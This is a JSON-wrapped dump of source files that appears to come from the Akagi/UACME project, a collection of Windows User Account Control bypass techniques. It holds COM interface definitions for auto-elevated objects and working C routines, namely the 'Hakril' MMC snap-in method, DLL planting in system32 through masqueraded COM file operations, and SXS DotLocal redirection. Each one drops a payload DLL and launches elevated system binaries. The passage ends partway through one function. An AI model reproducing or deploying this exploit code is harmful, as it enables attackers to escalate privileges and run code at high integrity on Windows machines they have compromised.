HRESULT(STDMETHODCALLTYPE *Method1)(\n __RPC__in IColorDataProxy * This);\n\n HRESULT(STDMETHODCALLTYPE *Method2)(\n __RPC__in IColorDataProxy * This);\n\n HRESULT(STDMETHODCALLTYPE *Method3)(\n __RPC__in IColorDataProxy * This);\n\n HRESULT(STDMETHODCALLTYPE *Method4)(\n __RPC__in IColorDataProxy * This);\n\n HRESULT(STDMETHODCALLTYPE *Method5)(\n __RPC__in IColorDataProxy * This);\n\n HRESULT(STDMETHODCALLTYPE *Method6)(\n __RPC__in IColorDataProxy * This);\n\n HRESULT(STDMETHODCALLTYPE *Method7)(\n __RPC__in IColorDataProxy * This);\n\n HRESULT(STDMETHODCALLTYPE *Method8)(\n __RPC__in IColorDataProxy * This);\n\n HRESULT(STDMETHODCALLTYPE *Method9)(\n __RPC__in IColorDataProxy * This);\n\n HRESULT(STDMETHODCALLTYPE *Method10)(\n __RPC__in IColorDataProxy * This);\n\n HRESULT(STDMETHODCALLTYPE *Method11)(\n __RPC__in IColorDataProxy * This);\n\n HRESULT(STDMETHODCALLTYPE *LaunchDccw)(\n __RPC__in IColorDataProxy * This,\n _In_ HWND hwnd);\n\n END_INTERFACE\n\n} *PIColorDataProxyVtbl;\n\ntypedef struct ICMLuaUtilVtbl {\n\n BEGIN_INTERFACE\n\n HRESULT(STDMETHODCALLTYPE *QueryInterface)(\n __RPC__in ICMLuaUtil * This,\n __RPC__in REFIID riid,\n _COM_Outptr_ void **ppvObject);\n\n ULONG(STDMETHODCALLTYPE *AddRef)(\n __RPC__in ICMLuaUtil * This);\n\n ULONG(STDMETHODCALLTYPE *Release)(\n __RPC__in ICMLuaUtil * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *SetRasCredentials)(\n __RPC__in ICMLuaUtil * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *SetRasEntryProperties)(\n __RPC__in ICMLuaUtil * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *DeleteRasEntry)(\n __RPC__in ICMLuaUtil * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *LaunchInfSection)(\n __RPC__in ICMLuaUtil * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *LaunchInfSectionEx)(\n __RPC__in ICMLuaUtil * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *CreateLayerDirectory)(\n __RPC__in ICMLuaUtil * This);\n\n HRESULT(STDMETHODCALLTYPE *ShellExec)(\n __RPC__in ICMLuaUtil * This,\n _In_ LPCTSTR lpFile,\n _In_opt_ LPCTSTR lpParameters,\n _In_opt_ LPCTSTR lpDirectory,\n _In_ ULONG fMask,\n _In_ ULONG nShow);\n\n HRESULT(STDMETHODCALLTYPE *SetRegistryStringValue)(\n __RPC__in ICMLuaUtil * This,\n _In_ HKEY hKey,\n _In_opt_ LPCTSTR lpSubKey,\n _In_opt_ LPCTSTR lpValueName,\n _In_ LPCTSTR lpValueString);\n\n HRESULT(STDMETHODCALLTYPE *DeleteRegistryStringValue)(\n __RPC__in ICMLuaUtil * This,\n _In_ HKEY hKey,\n _In_ LPCTSTR lpSubKey,\n _In_ LPCTSTR lpValueName);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *DeleteRegKeysWithoutSubKeys)(\n __RPC__in ICMLuaUtil * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *DeleteRegTree)(\n __RPC__in ICMLuaUtil * This);\n\n HRESULT(STDMETHODCALLTYPE *ExitWindowsFunc)(\n __RPC__in ICMLuaUtil * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *AllowAccessToTheWorld)(\n __RPC__in ICMLuaUtil * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *CreateFileAndClose)(\n __RPC__in ICMLuaUtil * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *DeleteHiddenCmProfileFiles)(\n __RPC__in ICMLuaUtil * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *CallCustomActionDll)(\n __RPC__in ICMLuaUtil * This);\n\n HRESULT(STDMETHODCALLTYPE *RunCustomActionExe)(\n __RPC__in ICMLuaUtil * This,\n _In_ LPCTSTR lpFile,\n _In_opt_ LPCTSTR lpParameters,\n _COM_Outptr_ LPCTSTR *pszHandleAsHexString);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *SetRasSubEntryProperties)(\n __RPC__in ICMLuaUtil * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *DeleteRasSubEntry)(\n __RPC__in ICMLuaUtil * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *SetCustomAuthData)(\n __RPC__in ICMLuaUtil * This);\n\n END_INTERFACE\n\n} *PICMLuaUtilVtbl;\n\ntypedef struct IFwCplLuaInterfaceVtbl {\n\n BEGIN_INTERFACE\n\n HRESULT(STDMETHODCALLTYPE* QueryInterface)(\n __RPC__in IFwCplLua* This,\n __RPC__in REFIID riid,\n _COM_Outptr_ void** ppvObject);\n\n ULONG(STDMETHODCALLTYPE* AddRef)(\n __RPC__in IFwCplLua* This);\n\n ULONG(STDMETHODCALLTYPE* Release)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* GetTypeInfoCount)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* GetTypeInfo)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* GetIDsOfNames)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* Invoke)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* AddGlobalPort)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* AddProgram)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* DeleteGlobalPort)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* DeleteApplication)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* EnablePort)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* EnableProgram)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* EnableRuleGroup)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* EnableCustomRule)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* EditGlobalPort)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* EditProgram)(\n __RPC__in IFwCplLua* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* Activate)(\n __RPC__in IFwCplLua* This);\n\n HRESULT(STDMETHODCALLTYPE* LaunchAdvancedUI)(\n __RPC__in IFwCplLua* This);\n\n END_INTERFACE\n\n} *PIFwCplLuaInterfaceVtbl;\n\ntypedef struct IEditionUpgradeManagerVtbl {\n\n BEGIN_INTERFACE\n\n HRESULT(STDMETHODCALLTYPE *QueryInterface)(\n __RPC__in IEditionUpgradeManager * This,\n __RPC__in REFIID riid,\n _COM_Outptr_ void **ppvObject);\n\n ULONG(STDMETHODCALLTYPE *AddRef)(\n __RPC__in IEditionUpgradeManager * This);\n\n ULONG(STDMETHODCALLTYPE *Release)(\n __RPC__in IEditionUpgradeManager * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *InitializeWindow)(\n __RPC__in IEditionUpgradeManager * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *UpdateOperatingSystem)(\n __RPC__in IEditionUpgradeManager * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *ShowProductKeyUI)(\n __RPC__in IEditionUpgradeManager * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *UpdateOperatingSystemWithParams)(\n __RPC__in IEditionUpgradeManager * This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE *AcquireModernLicenseForWindows)(\n __RPC__in IEditionUpgradeManager * This);\n\n HRESULT(STDMETHODCALLTYPE *AcquireModernLicenseWithPreviousId)(\n __RPC__in IEditionUpgradeManager * This,\n __RPC__in LPWSTR PreviousId,\n __RPC__in DWORD *Data);\n\n //incomplete, irrelevant\n END_INTERFACE\n\n} *PIEditionUpgradeManagerVtbl;\n\ntypedef struct ISecurityEditorVtbl {\n\n BEGIN_INTERFACE\n\n HRESULT(STDMETHODCALLTYPE *QueryInterface)(\n __RPC__in ISecurityEditor * This,\n __RPC__in REFIID riid,\n _COM_Outptr_ void **ppvObject);\n\n ULONG(STDMETHODCALLTYPE *AddRef)(\n __RPC__in ISecurityEditor * This);\n\n ULONG(STDMETHODCALLTYPE *Release)(\n __RPC__in ISecurityEditor * This);\n\n HRESULT(STDMETHODCALLTYPE *GetSecurity)(\n __RPC__in ISecurityEditor * This,\n _In_ LPCOLESTR ObjectName,\n _In_ SE_OBJECT_TYPE ObjectType,\n _In_ SECURITY_INFORMATION SecurityInfo,\n _Out_opt_ LPCOLESTR * ppSDDLStr);\n\n HRESULT(STDMETHODCALLTYPE *SetSecurity)(\n __RPC__in ISecurityEditor * This,\n _In_ LPCOLESTR ObjectName,\n _In_ SE_OBJECT_TYPE ObjectType,\n _In_ SECURITY_INFORMATION SecurityInfo,\n _In_ LPCOLESTR ppSDDLStr);\n\n END_INTERFACE\n\n} *PISecurityEditorVtbl;\n\ntypedef struct IIEAdminBrokerObjectVtbl {\n\n BEGIN_INTERFACE\n\n HRESULT(STDMETHODCALLTYPE* QueryInterface)(\n __RPC__in IIEAdminBrokerObject* This,\n __RPC__in REFIID riid,\n _COM_Outptr_ void** ppvObject);\n\n ULONG(STDMETHODCALLTYPE* AddRef)(\n __RPC__in IIEAdminBrokerObject* This);\n\n ULONG(STDMETHODCALLTYPE* Release)(\n __RPC__in IIEAdminBrokerObject* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* InitializeAdminInstaller)(\n __RPC__in IIEAdminBrokerObject* This,\n _In_opt_ LPCOLESTR ProviderName,\n _In_ DWORD Unknown0,\n _COM_Outptr_ void** InstanceGuid);\n\n END_INTERFACE\n\n} *PIIEAdminBrokerObjectVtbl;\n\ntypedef struct IActiveXInstallBrokerVtbl {\n\n BEGIN_INTERFACE\n\n HRESULT(STDMETHODCALLTYPE* QueryInterface)(\n __RPC__in IActiveXInstallBroker* This,\n __RPC__in REFIID riid,\n _COM_Outptr_ void** ppvObject);\n\n ULONG(STDMETHODCALLTYPE* AddRef)(\n __RPC__in IActiveXInstallBroker* This);\n\n ULONG(STDMETHODCALLTYPE* Release)(\n __RPC__in IActiveXInstallBroker* This);\n\n //incomplete definition\n HRESULT(STDMETHODCALLTYPE* VerifyFile)(\n __RPC__in IActiveXInstallBroker* This,\n _In_ BSTR InstanceGuid,\n _In_ HWND ParentWindow,\n _In_ BSTR Unknown0,\n _In_ BSTR pcwszFilePath,\n _In_ BSTR Unknown1,\n _In_ ULONG dwUIChoice,\n _In_ ULONG dwUIContext,\n _In_ REFGUID GuidKey,\n _Out_ BSTR* VerifiedFileName,\n _Out_ PULONG CertDetailsSize,\n _Out_ void** CertDetails);\n\n HRESULT(STDMETHODCALLTYPE* RunSetupCommand)(\n __RPC__in IActiveXInstallBroker* This,\n _In_ BSTR InstanceGuid,\n _In_ HWND ParentWindow,\n _In_ BSTR szCmdName,\n _In_ BSTR szInfSection,\n _In_ BSTR szDir,\n _In_ BSTR szTitle,\n _In_ ULONG dwFlags,\n _Out_ PHANDLE lpTargetHandle);\n\n //incomplete definition\n\n END_INTERFACE\n\n} *PIActiveXInstallBrokerVtbl;\n\ntypedef struct IWscAdminVtbl {\n\n BEGIN_INTERFACE\n\n HRESULT(STDMETHODCALLTYPE* QueryInterface)(\n __RPC__in IWscAdmin* This,\n __RPC__in REFIID riid,\n _COM_Outptr_ void** ppvObject);\n\n ULONG(STDMETHODCALLTYPE* AddRef)(\n __RPC__in IWscAdmin* This);\n\n ULONG(STDMETHODCALLTYPE* Release)(\n __RPC__in IWscAdmin* This);\n\n HRESULT(STDMETHODCALLTYPE* Initialize)(\n __RPC__in IWscAdmin* This);\n\n HRESULT(STDMETHODCALLTYPE* DoModalSecurityAction)(\n __RPC__in IWscAdmin* This,\n __RPC__in HWND ParentWindow,\n __RPC__in UINT Action,\n _Reserved_ PVOID Reserved);\n\n END_INTERFACE\n\n} *PIWscAdminVtbl;\n\ntypedef struct IElevatedFactoryServerVtbl {\n\n BEGIN_INTERFACE\n\n HRESULT(STDMETHODCALLTYPE* QueryInterface)(\n __RPC__in IElevatedFactoryServer* This,\n __RPC__in REFIID riid,\n _COM_Outptr_ void** ppvObject);\n\n ULONG(STDMETHODCALLTYPE* AddRef)(\n __RPC__in IElevatedFactoryServer* This);\n\n ULONG(STDMETHODCALLTYPE* Release)(\n __RPC__in IElevatedFactoryServer* This);\n\n HRESULT(STDMETHODCALLTYPE* ServerCreateElevatedObject)(\n __RPC__in IElevatedFactoryServer* This,\n __RPC__in REFCLSID rclsid,\n __RPC__in REFIID riid,\n _COM_Outptr_ void** ppvObject);\n\n //incomplete definition\n\n END_INTERFACE\n\n} *PIElevatedFactoryServerVtbl;\n\n// INTERFACE DEF\n\ninterface IColorDataProxy { CONST_VTBL struct IColorDataProxyVtbl* lpVtbl; };\ninterface ICMLuaUtil { CONST_VTBL struct ICMLuaUtilVtbl* lpVtbl; };\ninterface IFwCplLua { CONST_VTBL struct IFwCplLuaInterfaceVtbl* lpVtbl; };\ninterface IEditionUpgradeManager { CONST_VTBL struct IEditionUpgradeManagerVtbl* lpVtbl; };\ninterface ISecurityEditor { CONST_VTBL struct ISecurityEditorVtbl* lpVtbl; };\ninterface IIEAdminBrokerObject { CONST_VTBL struct IIEAdminBrokerObjectVtbl* lpVtbl; };\ninterface IActiveXInstallBroker { CONST_VTBL struct IActiveXInstallBrokerVtbl* lpVtbl; };\ninterface IWscAdmin { CONST_VTBL struct IWscAdminVtbl* lpVtbl; };\ninterface IElevatedFactoryServer { CONST_VTBL struct IElevatedFactoryServerVtbl* lpVtbl; };\n"
},
{
"path": "Source/Akagi/methods/hakril.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2017 - 2025\n*\n* TITLE: HAKRIL.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 Jul 2025\n*\n* UAC bypass method from Clement Rouault aka hakril.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"encresource.h\"\n\ntypedef ULONG_PTR(WINAPI* pfnAipFindLaunchAdminProcess)(\n LPWSTR lpApplicationName,\n LPWSTR lpParameters,\n DWORD UacRequestFlag,\n DWORD dwCreationFlags,\n LPWSTR lpCurrentDirectory,\n HWND hWnd,\n PVOID StartupInfo,\n PVOID ProcessInfo,\n ELEVATION_REASON* ElevationReason);\n\n/*\n* ucmHakrilMethod\n*\n* Purpose:\n*\n* Bypass UAC by abusing \"feature\" of appinfo command line parser.\n* (all bugs are features/not a boundary of %something% by MS philosophy)\n* Command line parser logic allows execution of custom snap-in console as if it\n* \"trusted\" by Microsoft, resulting in your code running inside MMC.exe on High IL.\n*\n* Trigger: custom console snap-in with shockwave flash object resulting in\n* execution of remote script on local machine with High IL.\n*\n*/\nNTSTATUS ucmHakrilMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n\n ULONG DataSize = 0, SnapinSize = 0;\n SIZE_T Dummy, MscBufferSize = 0, MscSize = 0, MscBytesIO = 0;\n PVOID SnapinResource = NULL, SnapinData = NULL, MscBufferPtr = NULL;\n PVOID ImageBaseAddress = g_hInstance; \n CHAR *pszMarker;\n\n WCHAR szBuffer[MAX_PATH * 2];\n WCHAR szParams[MAX_PATH * 3];\n CHAR szConvertedBuffer[MAX_PATH * 2];\n\n PROCESS_INFORMATION procInfo;\n\n do { \n\n //\n // Decrypt and decompress custom Kamikaze snap-in.\n //\n SnapinResource = supLdrQueryResourceData(\n KAMIKAZE_ID,\n ImageBaseAddress,\n &DataSize);\n\n if (SnapinResource) {\n SnapinData = g_ctx->DecompressRoutine(KAMIKAZE_ID, SnapinResource, DataSize, &SnapinSize);\n if (SnapinData == NULL)\n break;\n }\n else\n break;\n\n if (!supReplaceDllEntryPoint(\n ProxyDll,\n ProxyDllSize,\n FUBUKI_DEFAULT_ENTRYPOINT,\n TRUE))\n {\n break;\n }\n\n //\n // Write Fubuki to the %temp%\n //\n RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));\n _strcpy(szBuffer, g_ctx->szTempDirectory);\n Dummy = _strlen(szBuffer);\n _strcat(szBuffer, OSK_EXE);\n\n if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize))\n break;\n\n //\n // Build filename for launcher.\n //\n szBuffer[Dummy] = 0;\n _strcat(szBuffer, KAMIKAZE_LAUNCHER);\n\n MscBufferSize = ALIGN_UP_BY(SnapinSize + sizeof(szBuffer), PAGE_SIZE);\n MscBufferPtr = supVirtualAlloc(\n &MscBufferSize,\n DEFAULT_ALLOCATION_TYPE,\n DEFAULT_PROTECT_TYPE, NULL);\n if (MscBufferPtr == NULL)\n break;\n\n //\n // Converted filename to ANSI to be used in msc modification next.\n //\n RtlSecureZeroMemory(szConvertedBuffer, sizeof(szConvertedBuffer));\n WideCharToMultiByte(CP_ACP, 0, szBuffer, -1, szConvertedBuffer, sizeof(szConvertedBuffer), NULL, NULL);\n\n //\n // Write launcher to the %temp%\n //\n if (!supDecodeAndWriteBufferToFile(szBuffer,\n (CONST PVOID)g_encodedKamikazeFinal,\n sizeof(g_encodedKamikazeFinal),\n 'kmkz'))\n {\n break;\n }\n\n //\n // Build Kamikaze filename.\n //\n szBuffer[Dummy] = 0;\n _strcat(szBuffer, KAMIKAZE_MSC);\n\n //\n // Reconfigure msc snapin and write it to the %temp%.\n //\n pszMarker = _strstri_a((CHAR*)SnapinData, (const CHAR*)KAMIKAZE_MARKER);\n if (pszMarker && pszMarker >= (CHAR*)SnapinData &&\n pszMarker < ((CHAR*)SnapinData + SnapinSize)) {\n\n //\n // Copy first part of snapin (unchanged).\n //\n MscBytesIO = (ULONG)(pszMarker - (PCHAR)SnapinData);\n MscSize = MscBytesIO;\n RtlCopyMemory(MscBufferPtr, SnapinData, MscBytesIO);\n\n //\n // Copy modified part.\n //\n MscBytesIO = (ULONG)_strlen_a(szConvertedBuffer);\n RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), (PVOID)&szConvertedBuffer, MscBytesIO);\n MscSize += MscBytesIO;\n\n //\n // Copy all of the rest.\n //\n while (*pszMarker != 0 && *pszMarker != '<' &&\n pszMarker < ((CHAR*)SnapinData + SnapinSize)) \n {\n pszMarker++;\n }\n\n if (pszMarker < ((CHAR*)SnapinData + SnapinSize)) {\n MscBytesIO = (ULONG)(((PCHAR)SnapinData + SnapinSize) - pszMarker);\n RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), pszMarker, MscBytesIO);\n MscSize += MscBytesIO;\n }\n\n //\n // Write result to the file.\n //\n if (!supWriteBufferToFile(szBuffer, MscBufferPtr, (ULONG)MscSize))\n break;\n\n supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);\n MscBufferPtr = NULL;\n }\n\n //\n // Prepare snap-in parameters.\n //\n\n _strcpy(szParams, TEXT(\"lzx32,wf.msc \\\"\"));\n _strcat(szParams, szBuffer);\n _strcat(szParams, TEXT(\"\\\"\"));\n\n _strcpy(szBuffer, g_ctx->szSystemDirectory);\n _strcat(szBuffer, MMC_EXE);\n \n //\n // Run trigger application.\n //\n RtlSecureZeroMemory(&procInfo, sizeof(procInfo));\n if (AicLaunchAdminProcess(szBuffer,\n szParams,\n 1, //elevate\n CREATE_UNICODE_ENVIRONMENT | CREATE_SUSPENDED,\n g_ctx->szSystemRoot,\n T_DEFAULT_DESKTOP,\n NULL,\n INFINITE,\n SW_HIDE,\n &procInfo))\n {\n if (procInfo.hThread) {\n ResumeThread(procInfo.hThread);\n CloseHandle(procInfo.hThread);\n }\n if (procInfo.hProcess) {\n if (WaitForSingleObject(procInfo.hProcess, 5000) == WAIT_TIMEOUT)\n TerminateProcess(procInfo.hProcess, 0);\n CloseHandle(procInfo.hProcess);\n }\n\n MethodResult = STATUS_SUCCESS;\n }\n\n } while (FALSE);\n\n //\n // Cleanup.\n //\n if (MscBufferPtr) {\n supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);\n }\n if (SnapinData) {\n supSecureVirtualFree(SnapinData, SnapinSize, NULL);\n }\n\n return MethodResult;\n}\n\n/*\n* ucmHakrilMethodCleanup\n*\n* Purpose:\n*\n* Post execution cleanup routine for HakrilMethod\n*\n*/\nBOOL ucmHakrilMethodCleanup(\n VOID\n)\n{\n SIZE_T Dummy;\n WCHAR szBuffer[MAX_PATH * 2];\n\n _strcpy(szBuffer, g_ctx->szTempDirectory);\n Dummy = _strlen(szBuffer);\n _strcat(szBuffer, KAMIKAZE_MSC);\n DeleteFile(szBuffer);\n\n Sleep(1000);\n\n szBuffer[Dummy] = 0;\n _strcat(szBuffer, KAMIKAZE_LAUNCHER);\n DeleteFile(szBuffer);\n\n szBuffer[Dummy] = 0;\n _strcat(szBuffer, OSK_EXE);\n return DeleteFile(szBuffer);\n}\n"
},
{
"path": "Source/Akagi/methods/hybrids.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2015 - 2025\n*\n* TITLE: HYBRIDS.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 Jul 2025\n*\n* Hybrid UAC bypass methods.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"makecab.h\"\n#include \"encresource.h\"\n\n/*\n* ucmMethodCleanupSingleFileSystem32\n*\n* Purpose:\n*\n* Post execution cleanup routine.\n*\n*/\nBOOL ucmMethodCleanupSingleItemSystem32(\n _In_ LPCWSTR lpItemName,\n _In_opt_ LPCWSTR lpSubDirectory\n)\n{\n LPWSTR lpDestination;\n SIZE_T cb;\n BOOL bResult = FALSE;\n\n cb = 1 + sizeof(g_ctx->szSystemDirectory);\n cb += _strlen(lpItemName);\n if (lpSubDirectory) cb += _strlen(lpSubDirectory);\n\n cb *= sizeof(WCHAR);\n\n lpDestination = (LPWSTR)supHeapAlloc(cb);\n if (lpDestination) {\n\n _strcpy(lpDestination, g_ctx->szSystemDirectory);\n if (lpSubDirectory)\n _strcat(lpDestination, lpSubDirectory);\n\n _strcat(lpDestination, lpItemName);\n\n bResult = ucmMasqueradedDeleteDirectoryFileCOM(lpDestination);\n\n supHeapFree(lpDestination);\n }\n\n return bResult;\n}\n\n/*\n* ucmxGenericAutoelevationEx\n*\n* Purpose:\n*\n* Bypass UAC by abusing target autoelevated system32 application via missing system32 dll\n*\n*/\nNTSTATUS ucmGenericAutoelevationEx(\n _In_opt_ LPCWSTR lpTargetApp,\n _In_ LPCWSTR lpTargetDll,\n _In_opt_ LPCWSTR lpParameters,\n _In_opt_ LPCWSTR lpSubDirectory,\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n SIZE_T cb, nLen;\n LPWSTR lpSource, lpDestination;\n\n //\n // Allocate source path.\n //\n cb = (MAX_PATH * 2) +\n sizeof(g_ctx->szTempDirectory) +\n (_strlen(lpTargetDll) * sizeof(WCHAR));\n\n lpSource = (LPWSTR)supHeapAlloc(cb + sizeof(UNICODE_NULL));\n if (lpSource == NULL)\n return STATUS_MEMORY_NOT_ALLOCATED;\n\n //\n // Allocate destination path.\n //\n cb = sizeof(g_ctx->szSystemDirectory);\n if (lpSubDirectory)\n cb += (_strlen(lpSubDirectory) * sizeof(WCHAR));\n\n cb += (_strlen(lpTargetDll) * sizeof(WCHAR));\n\n lpDestination = (LPWSTR)supHeapAlloc(cb + sizeof(UNICODE_NULL));\n if (lpDestination == NULL) {\n supHeapFree(lpSource);\n return STATUS_MEMORY_NOT_ALLOCATED;\n }\n\n //put target dll\n _strcpy(lpSource, g_ctx->szTempDirectory);\n _strcat(lpSource, lpTargetDll);\n nLen = _strlen(lpSource);\n lpSource[nLen - 1] = UCM_TRASH_END_CHAR;\n\n //write proxy dll to disk\n if (supWriteBufferToFile(lpSource, ProxyDll, ProxyDllSize)) {\n\n //target dir\n _strcpy(lpDestination, g_ctx->szSystemDirectory);\n if (lpSubDirectory)\n _strcat(lpDestination, lpSubDirectory);\n\n //drop payload to system32\n if (ucmMasqueradedMoveFileCOM(lpSource, lpDestination)) {\n\n _strcpy(lpSource, lpDestination);\n _strcat(lpSource, lpTargetDll);\n nLen = _strlen(lpSource);\n lpSource[nLen - 1] = UCM_TRASH_END_CHAR;\n\n if (ucmMasqueradedRenameElementCOM(lpSource, lpTargetDll)) {\n\n //run target app\n if (lpTargetApp) {\n if (supRunProcess2(lpTargetApp,\n lpParameters,\n NULL,\n SW_HIDE,\n SUPRUNPROCESS_TIMEOUT_DEFAULT))\n {\n Sleep(5000);\n MethodResult = STATUS_SUCCESS;\n }\n }\n else {\n MethodResult = STATUS_SUCCESS;\n }\n }\n }\n }\n\n supHeapFree(lpSource);\n supHeapFree(lpDestination);\n\n return MethodResult;\n}\n\n/*\n* ucmGenericAutoelevation\n*\n* Purpose:\n*\n* Bypass UAC by abusing target autoelevated system32 application via missing system32 dll\n*\n*/\nNTSTATUS ucmGenericAutoelevation(\n _In_opt_ LPCWSTR lpTargetApp,\n _In_ LPCWSTR lpTargetDll,\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n return ucmGenericAutoelevationEx(lpTargetApp,\n lpTargetDll,\n NULL,\n NULL,\n ProxyDll,\n ProxyDllSize);\n\n}\n\n/*\n* ucmSXSMethod\n*\n* Purpose:\n*\n* Exploit SXS Local Redirect feature.\n*\n* SXS/Fusion uses dll redirection, attempting to load internal manifest dependencies from\n* non existent directory (this is so called DotLocal dll redirection), it is trying to do this\n* before going to WinSXS store.\n*\n* In this case dependency is Microsoft.Windows.Common-Controls.\n*\n* Maybe you think it is handy cool feature, but I think its another backdoor from lazy dotnet crew.\n* \"You keep shipping crap, and crap, and more crap\".\n*\n*/\nNTSTATUS ucmSXSMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize,\n _In_opt_ LPWSTR lpTargetDirectory, //single element in system32 with slash at end\n _In_ LPWSTR lpTargetApplication, //executable name\n _In_opt_ LPWSTR lpLaunchApplication, //executable name, must be in same dir as lpTargetApplication\n _In_ BOOL bConsentItself\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n WCHAR* lpszFullDllPath = NULL, * lpszDirectoryName = NULL;\n SIZE_T sz;\n LPWSTR lpSxsPath = NULL;\n\n WCHAR szSrc[MAX_PATH * 2], szDst[MAX_PATH * 2];\n WCHAR szCurDir[MAX_PATH * 2];\n\n SXS_SEARCH_CONTEXT sctx;\n\n if (lpTargetApplication == NULL)\n return STATUS_INVALID_PARAMETER_3;\n\n if (_strlen(lpTargetApplication) > MAX_PATH)\n return STATUS_INVALID_PARAMETER_3;\n\n do {\n\n //\n // Patch Fubuki to the new entry point\n //\n if (!supReplaceDllEntryPoint(ProxyDll,\n ProxyDllSize,\n FUBUKI_ENTRYPOINT_SXS,\n FALSE))\n {\n break;\n }\n\n //common part, locate sxs dll, drop payload to temp\n RtlSecureZeroMemory(szSrc, sizeof(szSrc));\n RtlSecureZeroMemory(szDst, sizeof(szDst));\n\n sz = UNICODE_STRING_MAX_BYTES;\n\n lpszFullDllPath = (WCHAR*)supVirtualAlloc(\n &sz,\n DEFAULT_ALLOCATION_TYPE,\n DEFAULT_PROTECT_TYPE,\n NULL);\n\n if (lpszFullDllPath == NULL)\n break;\n\n sctx.DllName = COMCTL32_DLL;\n sctx.SxsKey = COMCTL32_SXS;\n sctx.FullDllPath = lpszFullDllPath;\n\n if (!sxsFindLoaderEntry(&sctx))\n break;\n\n lpszDirectoryName = _filename(lpszFullDllPath);\n if (lpszDirectoryName == NULL)\n break;\n\n sz = PAGE_SIZE + (_strlen(lpszDirectoryName) * sizeof(WCHAR));\n\n lpSxsPath = (LPWSTR)supVirtualAlloc(\n &sz,\n DEFAULT_ALLOCATION_TYPE,\n DEFAULT_PROTECT_TYPE,\n NULL);\n\n if (lpSxsPath == NULL)\n break;\n\n _strcpy(lpSxsPath, g_ctx->szSystemDirectory);\n if (lpTargetDirectory) {\n _strcat(lpSxsPath, lpTargetDirectory);\n }\n _strcpy(szDst, lpTargetApplication);\n\n //\n // Workaround for consent, so it won't ban itself.\n // Create all files and target directories with fake root name.\n // Next when all fileop is done, rename fake root to real.\n //\n if (bConsentItself) {\n _strcat(szDst, 